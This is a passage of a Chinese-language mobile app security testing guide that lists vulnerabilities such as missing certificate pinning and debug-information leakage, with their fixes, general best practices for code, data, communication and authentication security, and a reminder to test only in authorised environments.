- 证书固定未实施
**修复:**
- 实施证书固定
- 验证证书链
- 使用系统证书存储
### 4. 调试信息泄露
**问题:**
- 日志包含敏感信息
- 错误信息泄露
- 调试模式未禁用
**修复:**
- 移除调试代码
- 限制日志输出
- 生产环境禁用调试
## 最佳实践
### 1. 代码安全
- 实施代码混淆
- 禁用调试功能
- 实施反调试保护
- 使用证书绑定
### 2. 数据安全
- 加密敏感数据
- 使用安全存储
- 实施密钥管理
- 限制数据访问
### 3. 通信安全
- 使用TLS/SSL
- 实施证书固定
- 验证服务器证书
- 使用安全API
### 4. 认证安全
- 实施强认证
- 安全Token管理
- 实施会话管理
- 使用生物识别
## 注意事项
- 仅在授权环境中进行测试
- 遵守法律法规
- 注意不同平台的差异
- 保护用户隐私

Some files were not shown because too many files have changed in this diff Show More